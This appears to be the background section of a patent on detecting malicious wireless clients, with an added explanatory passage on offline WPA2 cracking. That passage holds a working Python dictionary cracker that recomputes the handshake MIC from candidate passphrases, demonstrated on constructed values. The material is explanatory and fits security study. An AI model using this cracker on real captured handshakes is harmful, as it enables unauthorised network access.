1. Technical Field of the Invention
The present invention relates in general to wireless access network security, and in particular, to identifying malicious clients in wireless access networks.
2. Description of Related Art
Wireless access points (WAPs or APs) enable wireless communication devices (clients) to connect to a wireless network using Wi-Fi (IEEE 802.11) and other related standards, such as WCDMA/CDMA. The AP may connect not only to a wireless network, but also to a wired network, such as a local area network (LAN), to relay data between the wireless devices and wired devices on the LAN. In either case, the WAP is considered part of a wireless access network that provides access to another network, such as the Internet or a LAN.
For example, in a typical corporate environment, several WAPs are attached to the LAN to provide wireless access to the LAN. Within the range of the WAPs, wireless end users have full network connectivity with the benefit of mobility. In this instance, the WAP functions as a gateway for clients to access the LAN. Another wireless topology consists of a series of APs spread over a large area, each connected to a different network, to provide hot spots where wireless clients can connect to the Internet.
Since anyone within the geographic range of a WAP could conceivably connect to the Internet or LAN through the WAP, security measures have been developed to prevent unauthorized access and protect networks against attackers who send spam, release worms or perform other illegal actions using the wireless access network. The most common way to secure a wireless access network is to allow access only from known, approved MAC addresses. However, MAC filtering does nothing to protect traffic from being "sniffed", and a client device can easily spoof an approved MAC address once it has observed one on the air.
Another common security feature utilized by WAPs to prevent unauthorized access is wireless traffic encryption. For example, the majority of WAPs today incorporate Wired Equivalent Privacy (WEP) encryption or Wi-Fi Protected Access (WPA or WPA2) pre-shared key (password) security protocols. However, security analysts have demonstrated that WEP protection can easily be broken using tools available to the general public. In addition, if a weak passphrase, such as a dictionary word or short character string, is used, WPA and WPA2 can be cracked offline from a single captured handshake. Even using a long random passphrase may not prevent a sophisticated "sniffer" from breaking the network keys.
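The offline attack alluded to above works because a passive sniffer can capture the WPA2 four-way handshake and then test candidate passphrases without ever talking to the AP: each candidate is expanded to a PMK (PBKDF2-HMAC-SHA1 over the SSID), then to a PTK with the two nonces and two MAC addresses from the handshake, and the resulting KCK is used to recompute the MIC of EAPOL message 2. A match reveals the passphrase. The following is an added example, not code from the patent; the SSID, MAC addresses, nonces, EAPOL frame and wordlist are all constructed here for illustration, and the "captured" MIC is simulated by running the same derivation with the true passphrase.

```python
import hashlib
import hmac


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i PSK -> PMK: PBKDF2-HMAC-SHA1, salt = SSID, 4096 rounds, 256 bits."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11 PRF-512: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < 64:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:64]


def wpa2_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(AN,SN)||max(AN,SN))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """Key descriptor version 2 (CCMP): MIC = first 16 bytes of HMAC-SHA1(KCK, frame with MIC field = 0)."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


# ---- constructed handshake material (not from a real capture) ----
SSID = "CorpNet"
AP_MAC = bytes.fromhex("00112233aabb")
STA_MAC = bytes.fromhex("66778899ccdd")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))


def build_eapol_msg2(snonce: bytes) -> bytes:
    """Minimal EAPOL-Key message 2 (MIC field zeroed), 99 bytes, as the attacker would reconstruct it."""
    body = (
        b"\x02"          # descriptor type: RSN
        + b"\x01\x0a"    # key info: version 2 (HMAC-SHA1), pairwise, MIC bit set
        + b"\x00\x00"    # key length
        + b"\x00" * 7 + b"\x01"   # replay counter
        + snonce         # key nonce (SNonce)
        + b"\x00" * 16   # key IV
        + b"\x00" * 8    # key RSC
        + b"\x00" * 8    # key ID
        + b"\x00" * 16   # MIC (zeroed for computation)
        + b"\x00\x00"    # key data length
    )
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # 802.1X v1, type EAPOL-Key


def kck_for(passphrase: str) -> bytes:
    return wpa2_ptk(wpa2_pmk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]


def simulate_captured_mic(true_passphrase: str) -> bytes:
    """What a sniffer would read out of message 2 when the network uses true_passphrase."""
    return eapol_mic(kck_for(true_passphrase), build_eapol_msg2(SNONCE))


def crack_psk(wordlist, captured_mic: bytes):
    """Offline dictionary attack: return the candidate whose derived KCK reproduces the captured MIC."""
    frame = build_eapol_msg2(SNONCE)
    for candidate in wordlist:
        if hmac.compare_digest(eapol_mic(kck_for(candidate), frame), captured_mic):
            return candidate
    return None


WORDLIST = ["letmein", "welcome", "password", "password123", "corpnet2024", "qwerty"]

if __name__ == "__main__":
    print("weak passphrase ->", crack_psk(WORDLIST, simulate_captured_mic("password123")))
    print("random passphrase ->", crack_psk(WORDLIST, simulate_captured_mic("G7v!qZ2p#Lm9xR4e")))
```

Each candidate costs 4096 HMAC-SHA1 rounds, which is exactly why a dictionary word falls quickly while a long random passphrase forces the attacker through the whole search space; the PBKDF2 work factor slows the search but does not change its feasibility against guessable input.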
Once an attacker gains access to a WAP, the attacker can begin to transmit malicious traffic, such as spam, worms and other undesired traffic onto other networks through the wireless access network. The malicious traffic sent by the attacker increases the burden on the WAP, even if the malicious traffic is later identified and dropped by the network. In addition, since the malicious traffic is mixed with good (normal) traffic, it becomes more difficult to detect stealthy attackers/worms.